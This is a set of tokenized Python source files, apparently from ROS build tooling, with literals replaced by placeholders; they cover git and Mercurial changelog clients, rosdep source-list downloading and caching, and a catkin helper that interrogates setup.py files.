_run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> affected_paths = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> log_entries . append ( LogEntry ( msg , affected_paths , self . _get_author ( hash_ ) ) ) <EOL> return log_entries <EOL> def replace_repository_references ( self , line ) : <EOL> if self . _repo_hosting is None : <EOL> self . _repo_hosting = False <EOL> try : <EOL> self . _determine_repo_hosting ( ) <EOL> except RuntimeError : <EOL> pass <EOL> if self . _repo_hosting == '<STR_LIT>' : <EOL> line = self . _replace_github_issue_references ( line ) <EOL> return line <EOL> def _determine_repo_hosting ( self ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> prefixes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for prefix in prefixes : <EOL> if result [ '<STR_LIT>' ] . startswith ( prefix ) : <EOL> self . _repo_hosting = '<STR_LIT>' <EOL> path = result [ '<STR_LIT>' ] [ len ( prefix ) : ] <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> path = path [ : - <NUM_LIT:4> ] <EOL> self . _github_path = path <EOL> break <EOL> def _replace_github_issue_references ( self , line ) : <EOL> valid_name = '<STR_LIT>' <EOL> issue_pattern = '<STR_LIT>' <EOL> def replace_issue_number ( match ) : <EOL> issue_url = self . _github_base_url <EOL> if match . group ( <NUM_LIT:1> ) : <EOL> path = match . group ( <NUM_LIT:1> ) <EOL> issue_url += path <EOL> else : <EOL> path = '<STR_LIT>' <EOL> issue_url += self . _github_path <EOL> issue_number = match . group ( <NUM_LIT:2> ) <EOL> issue_url += '<STR_LIT>' + issue_number <EOL> return '<STR_LIT>' % ( path , issue_number , issue_url ) <EOL> line = re . 
sub ( ( '<STR_LIT>' % ( valid_name , valid_name ) ) + issue_pattern , replace_issue_number , line ) <EOL> return line <EOL> class HgClient ( VcsClientBase ) : <EOL> type = '<STR_LIT>' <EOL> def __init__ ( self , path ) : <EOL> super ( HgClient , self ) . __init__ ( path ) <EOL> self . _executable = self . _find_executable ( '<STR_LIT>' ) <EOL> def _get_author ( self , hash_ ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> return result [ '<STR_LIT>' ] <EOL> def get_tags ( self ) : <EOL> cmd_tag = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_tag = self . _run_command ( cmd_tag ) <EOL> if result_tag [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_tag [ '<STR_LIT>' ] ) <EOL> tag_names = result_tag [ '<STR_LIT>' ] . splitlines ( ) <EOL> tags = [ ] <EOL> for tag_name in tag_names : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , tag_name , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tags . append ( Tag ( tag_name , result [ '<STR_LIT>' ] ) ) <EOL> self . _truncate_timestamps ( tags ) <EOL> return tags <EOL> def get_latest_tag_name ( self ) : <EOL> cmd_log = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_log = self . 
_run_command ( cmd_log ) <EOL> if result_log [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_log [ '<STR_LIT>' ] ) <EOL> tag_name = result_log [ '<STR_LIT>' ] <EOL> return tag_name <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> revrange = '<STR_LIT>' % ( ( to_tag if to_tag else '<STR_LIT>' ) , ( from_tag if from_tag else '<STR_LIT>' ) ) <EOL> if to_tag : <EOL> revrange += '<STR_LIT>' % to_tag <EOL> if from_tag : <EOL> revrange += '<STR_LIT>' % from_tag <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , revrange , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tmp_base = tempfile . mkdtemp ( '<STR_LIT>' ) <EOL> try : <EOL> style_file = os . path . join ( tmp_base , '<STR_LIT>' ) <EOL> with open ( style_file , '<STR_LIT:w>' ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> log_entries = [ ] <EOL> if result [ '<STR_LIT>' ] : <EOL> revs = reversed ( result [ '<STR_LIT>' ] . splitlines ( ) ) <EOL> for rev in revs : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , rev , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> if result [ '<STR_LIT>' ] == from_tag : <EOL> continue <EOL> msg = result [ '<STR_LIT>' ] <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , rev , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' , style_file ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> affected_paths = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> log_entries . append ( LogEntry ( msg , affected_paths , self . _get_author ( rev ) ) ) <EOL> finally : <EOL> shutil . 
rmtree ( tmp_base ) <EOL> return log_entries <EOL> def get_vcs_client ( base_path ) : <EOL> vcs_clients = [ ] <EOL> vcs_clients . append ( GitClient ) <EOL> vcs_clients . append ( HgClient ) <EOL> client_types = [ c . type for c in vcs_clients ] <EOL> if len ( client_types ) != len ( set ( client_types ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( sorted ( client_types ) ) ) <EOL> for vcs_client in vcs_clients : <EOL> if os . path . exists ( os . path . join ( base_path , '<STR_LIT>' % vcs_client . type ) ) : <EOL> return vcs_client ( base_path ) <EOL> raise RuntimeError ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ c . type for c in vcs_clients ] ) ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import yaml <EOL> import hashlib <EOL> try : <EOL> from urllib . request import urlopen <EOL> from urllib . error import URLError <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> from urllib2 import URLError <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from . core import InvalidData , DownloadFailure , CachePermissionError <EOL> from . gbpdistro_support import get_gbprepo_as_rosdep_data , download_gbpdistro_as_rosdep_data <EOL> try : <EOL> import urlparse <EOL> except ImportError : <EOL> import urllib . parse as urlparse <EOL> try : <EOL> import httplib <EOL> except ImportError : <EOL> import http . client as httplib <EOL> import rospkg <EOL> import rospkg . distro <EOL> from . loader import RosdepLoader <EOL> from . rosdistrohelper import get_index , get_index_url <EOL> DEFAULT_SOURCES_LIST_URL = '<STR_LIT>' <EOL> DOWNLOAD_TIMEOUT = <NUM_LIT> <EOL> SOURCES_LIST_DIR = '<STR_LIT>' <EOL> SOURCES_CACHE_DIR = '<STR_LIT>' <EOL> CACHE_INDEX = '<STR_LIT:index>' <EOL> PICKLE_CACHE_EXT = '<STR_LIT>' <EOL> SOURCE_PATH_ENV = '<STR_LIT>' <EOL> def get_sources_list_dirs ( source_list_dir ) : <EOL> if SOURCE_PATH_ENV in os . environ : <EOL> sdirs = os . environ [ SOURCE_PATH_ENV ] . split ( os . pathsep ) <EOL> else : <EOL> sdirs = [ source_list_dir ] <EOL> for p in list ( sdirs ) : <EOL> if not os . path . exists ( p ) : <EOL> sdirs . remove ( p ) <EOL> return sdirs <EOL> def get_sources_list_dir ( ) : <EOL> if <NUM_LIT:0> : <EOL> etc_ros = rospkg . get_etc_ros_dir ( ) <EOL> else : <EOL> etc_ros = '<STR_LIT>' <EOL> sys_sources_list_dir = os . path . 
join ( etc_ros , '<STR_LIT>' , SOURCES_LIST_DIR ) <EOL> sources_list_dirs = get_sources_list_dirs ( sys_sources_list_dir ) <EOL> if sources_list_dirs : <EOL> return sources_list_dirs [ <NUM_LIT:0> ] <EOL> else : <EOL> return sys_sources_list_dir <EOL> def get_default_sources_list_file ( ) : <EOL> return os . path . join ( get_sources_list_dir ( ) , '<STR_LIT>' ) <EOL> def get_sources_cache_dir ( ) : <EOL> ros_home = rospkg . get_ros_home ( ) <EOL> return os . path . join ( ros_home , '<STR_LIT>' , SOURCES_CACHE_DIR ) <EOL> TYPE_YAML = '<STR_LIT>' <EOL> TYPE_GBPDISTRO = '<STR_LIT>' <EOL> VALID_TYPES = [ TYPE_YAML , TYPE_GBPDISTRO ] <EOL> class DataSource ( object ) : <EOL> def __init__ ( self , type_ , url , tags , origin = None ) : <EOL> """<STR_LIT>""" <EOL> if not type_ in VALID_TYPES : <EOL> raise ValueError ( "<STR_LIT>" % ( '<STR_LIT:U+002C>' . join ( VALID_TYPES ) ) ) <EOL> parsed = urlparse . urlparse ( url ) <EOL> if not parsed . scheme or ( parsed . scheme != '<STR_LIT:file>' and not parsed . netloc ) or parsed . path in ( '<STR_LIT>' , '<STR_LIT:/>' ) : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( url ) ) ) <EOL> if not type ( tags ) == list : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( tags ) ) ) <EOL> self . type = type_ <EOL> self . tags = tags <EOL> self . url = url <EOL> self . origin = origin <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , DataSource ) and self . type == other . type and self . tags == other . tags and self . url == other . url and self . origin == other . origin <EOL> def __str__ ( self ) : <EOL> if self . origin : <EOL> return "<STR_LIT>" % ( self . origin , self . type , self . url , '<STR_LIT:U+0020>' . join ( self . tags ) ) <EOL> else : <EOL> return "<STR_LIT>" % ( self . type , self . url , '<STR_LIT:U+0020>' . join ( self . tags ) ) <EOL> def __repr__ ( self ) : <EOL> return repr ( ( self . type , self . url , self . tags , self . 
origin ) ) <EOL> class RosDistroSource ( DataSource ) : <EOL> def __init__ ( self , distro ) : <EOL> self . type = TYPE_GBPDISTRO <EOL> self . tags = [ distro ] <EOL> self . url = get_index ( ) . distributions [ distro ] [ '<STR_LIT>' ] <EOL> self . origin = None <EOL> def cache_data_source_loader ( sources_cache_dir , verbose = False ) : <EOL> def create_model ( type_ , uri , tags , origin = None ) : <EOL> filename = compute_filename_hash ( uri ) <EOL> filepath = os . path . join ( sources_cache_dir , filename ) <EOL> pickle_filepath = filepath + PICKLE_CACHE_EXT <EOL> if os . path . exists ( pickle_filepath ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( uri , pickle_filepath ) , file = sys . stderr ) <EOL> with open ( pickle_filepath , '<STR_LIT:rb>' ) as f : <EOL> rosdep_data = pickle . loads ( f . read ( ) ) <EOL> elif os . path . exists ( filepath ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( uri , filepath ) , file = sys . stderr ) <EOL> with open ( filepath ) as f : <EOL> rosdep_data = yaml . load ( f . read ( ) ) <EOL> else : <EOL> rosdep_data = { } <EOL> return CachedDataSource ( type_ , uri , tags , rosdep_data , origin = filepath ) <EOL> return create_model <EOL> class CachedDataSource ( object ) : <EOL> def __init__ ( self , type_ , url , tags , rosdep_data , origin = None ) : <EOL> """<STR_LIT>""" <EOL> self . source = DataSource ( type_ , url , tags , origin = origin ) <EOL> self . rosdep_data = rosdep_data <EOL> def __eq__ ( self , other ) : <EOL> try : <EOL> return self . source == other . source and self . rosdep_data == other . rosdep_data <EOL> except AttributeError : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . source , self . rosdep_data ) <EOL> def __repr__ ( self ) : <EOL> return repr ( ( self . type , self . url , self . tags , self . rosdep_data , self . origin ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . 
type <EOL> @ property <EOL> def url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . url <EOL> @ property <EOL> def tags ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . tags <EOL> @ property <EOL> def origin ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . origin <EOL> class DataSourceMatcher ( object ) : <EOL> def __init__ ( self , tags ) : <EOL> self . tags = tags <EOL> def matches ( self , rosdep_data_source ) : <EOL> """<STR_LIT>""" <EOL> return not any ( set ( rosdep_data_source . tags ) - set ( self . tags ) ) <EOL> @ staticmethod <EOL> def create_default ( os_override = None ) : <EOL> """<STR_LIT>""" <EOL> distro_name = rospkg . distro . current_distro_codename ( ) <EOL> if os_override is None : <EOL> os_detect = rospkg . os_detect . OsDetect ( ) <EOL> os_name , os_version , os_codename = os_detect . detect_os ( ) <EOL> else : <EOL> os_name , os_codename = os_override <EOL> tags = [ t for t in ( distro_name , os_name , os_codename ) if t ] <EOL> return DataSourceMatcher ( tags ) <EOL> def download_rosdep_data ( url ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f = urlopen ( url , timeout = DOWNLOAD_TIMEOUT ) <EOL> text = f . read ( ) <EOL> f . close ( ) <EOL> data = yaml . safe_load ( text ) <EOL> if type ( data ) != dict : <EOL> raise DownloadFailure ( '<STR_LIT>' % ( url ) ) <EOL> return data <EOL> except ( URLError , httplib . HTTPException ) as e : <EOL> raise DownloadFailure ( str ( e ) + '<STR_LIT>' % url ) <EOL> except yaml . YAMLError as e : <EOL> raise DownloadFailure ( str ( e ) ) <EOL> def download_default_sources_list ( url = DEFAULT_SOURCES_LIST_URL ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f = urlopen ( url , timeout = DOWNLOAD_TIMEOUT ) <EOL> except ( URLError , httplib . HTTPException ) as e : <EOL> raise URLError ( str ( e ) + '<STR_LIT>' % url ) <EOL> data = f . read ( ) . decode ( ) <EOL> f . 
close ( ) <EOL> if not data : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> parse_sources_data ( data ) <EOL> return data <EOL> def parse_sources_data ( data , origin = '<STR_LIT>' , model = None ) : <EOL> """<STR_LIT>""" <EOL> if model is None : <EOL> model = DataSource <EOL> sources = [ ] <EOL> for line in data . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> splits = line . split ( '<STR_LIT:U+0020>' ) <EOL> if len ( splits ) < <NUM_LIT:2> : <EOL> raise InvalidData ( "<STR_LIT>" % ( line ) , origin = origin ) <EOL> type_ = splits [ <NUM_LIT:0> ] <EOL> url = splits [ <NUM_LIT:1> ] <EOL> tags = splits [ <NUM_LIT:2> : ] <EOL> try : <EOL> sources . append ( model ( type_ , url , tags , origin = origin ) ) <EOL> except ValueError as e : <EOL> raise InvalidData ( "<STR_LIT>" % ( line , e ) , origin = origin ) <EOL> return sources <EOL> def parse_sources_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with open ( filepath , '<STR_LIT:r>' ) as f : <EOL> return parse_sources_data ( f . read ( ) , origin = filepath ) <EOL> except IOError as e : <EOL> raise InvalidData ( "<STR_LIT>" % ( str ( e ) ) , origin = filepath ) <EOL> def parse_sources_list ( sources_list_dir = None ) : <EOL> """<STR_LIT>""" <EOL> if sources_list_dir is None : <EOL> sources_list_dir = get_sources_list_dir ( ) <EOL> sources_list_dirs = get_sources_list_dirs ( sources_list_dir ) <EOL> filelist = [ ] <EOL> for sdir in sources_list_dirs : <EOL> filelist += sorted ( [ os . path . join ( sdir , f ) for f in os . listdir ( sdir ) if f . endswith ( '<STR_LIT>' ) ] ) <EOL> sources_list = [ ] <EOL> for f in filelist : <EOL> sources_list . 
extend ( parse_sources_file ( f ) ) <EOL> return sources_list <EOL> def _generate_key_from_urls ( urls ) : <EOL> try : <EOL> assert isinstance ( urls , ( list , basestring ) ) <EOL> except NameError : <EOL> assert isinstance ( urls , ( list , str ) ) <EOL> return '<STR_LIT>' . join ( urls if isinstance ( urls , list ) else [ urls ] ) <EOL> def update_sources_list ( sources_list_dir = None , sources_cache_dir = None , <EOL> success_handler = None , error_handler = None ) : <EOL> """<STR_LIT>""" <EOL> if sources_cache_dir is None : <EOL> sources_cache_dir = get_sources_cache_dir ( ) <EOL> sources = parse_sources_list ( sources_list_dir = sources_list_dir ) <EOL> retval = [ ] <EOL> for source in list ( sources ) : <EOL> try : <EOL> if source . type == TYPE_YAML : <EOL> rosdep_data = download_rosdep_data ( source . url ) <EOL> elif source . type == TYPE_GBPDISTRO : <EOL> if not source . tags [ <NUM_LIT:0> ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> print ( '<STR_LIT>' % source . tags [ <NUM_LIT:0> ] ) <EOL> sources . remove ( source ) <EOL> continue <EOL> rosdep_data = download_gbpdistro_as_rosdep_data ( source . url ) <EOL> retval . append ( ( source , write_cache_file ( sources_cache_dir , source . url , rosdep_data ) ) ) <EOL> if success_handler is not None : <EOL> success_handler ( source ) <EOL> except DownloadFailure as e : <EOL> if error_handler is not None : <EOL> error_handler ( source , e ) <EOL> print ( '<STR_LIT>' % get_index_url ( ) ) <EOL> for dist_name in sorted ( get_index ( ) . distributions . keys ( ) ) : <EOL> print ( '<STR_LIT>' % dist_name ) <EOL> rds = RosDistroSource ( dist_name ) <EOL> rosdep_data = get_gbprepo_as_rosdep_data ( dist_name ) <EOL> dist_files = get_index ( ) . distributions [ dist_name ] [ '<STR_LIT>' ] <EOL> key = _generate_key_from_urls ( dist_files ) <EOL> retval . append ( ( rds , write_cache_file ( sources_cache_dir , key , rosdep_data ) ) ) <EOL> sources . append ( rds ) <EOL> if not os . path . 
exists ( sources_cache_dir ) : <EOL> os . makedirs ( sources_cache_dir ) <EOL> cache_index = os . path . join ( sources_cache_dir , CACHE_INDEX ) <EOL> data = "<STR_LIT>" <EOL> for source in sources : <EOL> url = _generate_key_from_urls ( source . url ) <EOL> data += "<STR_LIT>" % ( url , '<STR_LIT:U+0020>' . join ( source . tags ) ) <EOL> write_atomic ( cache_index , data ) <EOL> return retval <EOL> def load_cached_sources_list ( sources_cache_dir = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if sources_cache_dir is None : <EOL> sources_cache_dir = get_sources_cache_dir ( ) <EOL> cache_index = os . path . join ( sources_cache_dir , '<STR_LIT:index>' ) <EOL> if not os . path . exists ( cache_index ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> return [ ] <EOL> with open ( cache_index , '<STR_LIT:r>' ) as f : <EOL> cache_data = f . read ( ) <EOL> model = cache_data_source_loader ( sources_cache_dir , verbose = verbose ) <EOL> return parse_sources_data ( cache_data , origin = cache_index , model = model ) <EOL> def compute_filename_hash ( key_filenames ) : <EOL> sha_hash = hashlib . sha1 ( ) <EOL> if isinstance ( key_filenames , list ) : <EOL> for key in key_filenames : <EOL> sha_hash . update ( key . encode ( ) ) <EOL> else : <EOL> sha_hash . update ( key_filenames . encode ( ) ) <EOL> return sha_hash . hexdigest ( ) <EOL> def write_cache_file ( source_cache_d , key_filenames , rosdep_data ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( source_cache_d ) : <EOL> os . makedirs ( source_cache_d ) <EOL> key_hash = compute_filename_hash ( key_filenames ) <EOL> filepath = os . path . join ( source_cache_d , key_hash ) <EOL> try : <EOL> write_atomic ( filepath + PICKLE_CACHE_EXT , pickle . dumps ( rosdep_data , - <NUM_LIT:1> ) , True ) <EOL> except OSError as e : <EOL> raise CachePermissionError ( "<STR_LIT>" + str ( e ) ) <EOL> try : <EOL> os . 
unlink ( filepath ) <EOL> except OSError : <EOL> pass <EOL> return filepath <EOL> def write_atomic ( filepath , data , binary = False ) : <EOL> fd , filepath_tmp = tempfile . mkstemp ( prefix = os . path . basename ( filepath ) + '<STR_LIT>' , dir = os . path . dirname ( filepath ) ) <EOL> if ( binary ) : <EOL> fmode = '<STR_LIT:wb>' <EOL> else : <EOL> fmode = '<STR_LIT:w>' <EOL> with os . fdopen ( fd , fmode ) as f : <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> try : <EOL> os . rename ( filepath_tmp , filepath ) <EOL> except OSError : <EOL> try : <EOL> os . unlink ( filepath ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . rename ( filepath_tmp , filepath ) <EOL> except OSError : <EOL> os . unlink ( filepath_tmp ) <EOL> class SourcesListLoader ( RosdepLoader ) : <EOL> """<STR_LIT>""" <EOL> ALL_VIEW_KEY = '<STR_LIT>' <EOL> def __init__ ( self , sources ) : <EOL> """<STR_LIT>""" <EOL> self . sources = sources <EOL> @ staticmethod <EOL> def create_default ( matcher = None , sources_cache_dir = None , os_override = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if matcher is None : <EOL> matcher = DataSourceMatcher . create_default ( os_override = os_override ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( '<STR_LIT:U+002CU+0020>' . join ( matcher . tags ) ) , file = sys . stderr ) <EOL> sources = load_cached_sources_list ( sources_cache_dir = sources_cache_dir , verbose = verbose ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( len ( sources ) ) , file = sys . stderr ) <EOL> sources = [ x for x in sources if matcher . matches ( x ) ] <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( len ( sources ) ) , file = sys . stderr ) <EOL> return SourcesListLoader ( sources ) <EOL> def load_view ( self , view_name , rosdep_db , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if rosdep_db . is_loaded ( view_name ) : <EOL> return <EOL> source = self . get_source ( view_name ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( view_name ) , file = sys . 
stderr ) <EOL> view_dependencies = self . get_view_dependencies ( view_name ) <EOL> rosdep_db . set_view_data ( view_name , source . rosdep_data , view_dependencies , view_name ) <EOL> def get_loadable_resources ( self ) : <EOL> return [ ] <EOL> def get_loadable_views ( self ) : <EOL> return [ x . url for x in self . sources ] <EOL> def get_view_dependencies ( self , view_name ) : <EOL> if view_name != SourcesListLoader . ALL_VIEW_KEY : <EOL> if any ( [ x for x in self . sources if view_name == x . url ] ) : <EOL> return [ ] <EOL> return [ x . url for x in self . sources ] <EOL> def get_source ( self , view_name ) : <EOL> matches = [ x for x in self . sources if x . url == view_name ] <EOL> if matches : <EOL> return matches [ <NUM_LIT:0> ] <EOL> else : <EOL> raise rospkg . ResourceNotFound ( view_name ) <EOL> def get_rosdeps ( self , resource_name , implicit = True ) : <EOL> """<STR_LIT>""" <EOL> raise rospkg . ResourceNotFound ( resource_name ) <EOL> def get_view_key ( self , resource_name ) : <EOL> """<STR_LIT>""" <EOL> raise rospkg . ResourceNotFound ( resource_name ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import distutils . core <EOL> try : <EOL> import setuptools <EOL> except ImportError : <EOL> pass <EOL> from argparse import ArgumentParser <EOL> def _get_locations ( pkgs , package_dir ) : <EOL> """<STR_LIT>""" <EOL> locations = { } <EOL> allprefix = package_dir . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for pkg in pkgs : <EOL> parent_location = None <EOL> splits = pkg . split ( '<STR_LIT:.>' ) <EOL> for key_len in range ( len ( splits ) ) : <EOL> key = '<STR_LIT:.>' . join ( splits [ : key_len + <NUM_LIT:1> ] ) <EOL> if key not in locations : <EOL> if key in package_dir : <EOL> locations [ key ] = package_dir [ key ] <EOL> elif parent_location is not None : <EOL> locations [ key ] = os . path . join ( parent_location , splits [ key_len ] ) <EOL> else : <EOL> locations [ key ] = os . path . join ( allprefix , key ) <EOL> parent_location = locations [ key ] <EOL> return locations <EOL> def generate_cmake_file ( package_name , version , scripts , package_dir , pkgs , modules ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' % package_name <EOL> result = [ ] <EOL> result . append ( r'<STR_LIT>' % ( prefix , version ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( scripts ) ) ) <EOL> locations = _get_locations ( pkgs , package_dir ) <EOL> for pkgname , location in locations . items ( ) : <EOL> if not '<STR_LIT:.>' in pkgname : <EOL> continue <EOL> splits = pkgname . split ( '<STR_LIT:.>' ) <EOL> if splits [ <NUM_LIT:1> ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> root_name = splits [ <NUM_LIT:0> ] <EOL> root_location = location <EOL> for _ in range ( len ( splits ) - <NUM_LIT:1> ) : <EOL> root_location = os . path . 
dirname ( root_location ) <EOL> if root_location != locations [ root_name ] : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % ( pkgname , location , root_name , locations [ root_name ] ) ) <EOL> pkgs = [ p for p in pkgs if '<STR_LIT:.>' not in p ] <EOL> resolved_pkgs = [ ] <EOL> for pkg in pkgs : <EOL> resolved_pkgs += [ locations [ pkg ] ] <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( pkgs ) ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( resolved_pkgs ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) ) ) <EOL> filtered_modules = [ ] <EOL> for modname in modules : <EOL> splits = modname . split ( '<STR_LIT:.>' ) <EOL> equals_package = [ ( '<STR_LIT:.>' . join ( splits [ : - i ] ) in locations ) for i in range ( len ( splits ) ) ] <EOL> if any ( equals_package ) : <EOL> continue <EOL> filtered_modules . append ( modname ) <EOL> module_locations = _get_locations ( filtered_modules , package_dir ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( [ '<STR_LIT>' % m . replace ( '<STR_LIT:.>' , '<STR_LIT:/>' ) for m in filtered_modules ] ) ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( [ module_locations [ m ] for m in filtered_modules ] ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) ) ) <EOL> return result <EOL> def _create_mock_setup_function ( package_name , outfile ) : <EOL> """<STR_LIT>""" <EOL> def setup ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:version>' not in kwargs : <EOL> sys . stderr . write ( "<STR_LIT>" % package_name ) <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> version = kwargs [ '<STR_LIT:version>' ] <EOL> package_dir = kwargs . get ( '<STR_LIT>' , { } ) <EOL> pkgs = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> scripts = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> modules = kwargs . 
get ( '<STR_LIT>' , [ ] ) <EOL> unsupported_args = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> used_unsupported_args = [ arg for arg in unsupported_args if arg in kwargs ] <EOL> if used_unsupported_args : <EOL> sys . stderr . write ( "<STR_LIT>" % ( used_unsupported_args , package_name ) ) <EOL> result = generate_cmake_file ( package_name = package_name , <EOL> version = version , <EOL> scripts = scripts , <EOL> package_dir = package_dir , <EOL> pkgs = pkgs , <EOL> modules = modules ) <EOL> with open ( outfile , '<STR_LIT:w>' ) as out : <EOL> out . write ( '<STR_LIT:\n>' . join ( result ) ) <EOL> return setup <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> os . chdir ( os . path . dirname ( os . path . abspath ( args . setupfile_path ) ) ) <EOL> try : <EOL> fake_setup = _create_mock_setup_function ( package_name = args . package_name , <EOL> outfile = args . outfile ) <EOL> distutils_backup = distutils . core . setup <EOL> distutils . core . setup = fake_setup <EOL> try : <EOL> setuptools_backup = setuptools . setup <EOL> setuptools . setup = fake_setup <EOL> except NameError : <EOL> pass <EOL> with open ( args . setupfile_path , '<STR_LIT:r>' ) as fh : <EOL> local_vars = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : os . path . abspath ( args . setupfile_path ) , <EOL> '<STR_LIT>' : '<STR_LIT:__main__>' , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> exec ( fh . read ( ) , { } , local_vars ) <EOL> finally : <EOL> distutils . core . setup = distutils_backup <EOL> try : <EOL> setuptools . 
setup = setuptools_backup <EOL> except NameError : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
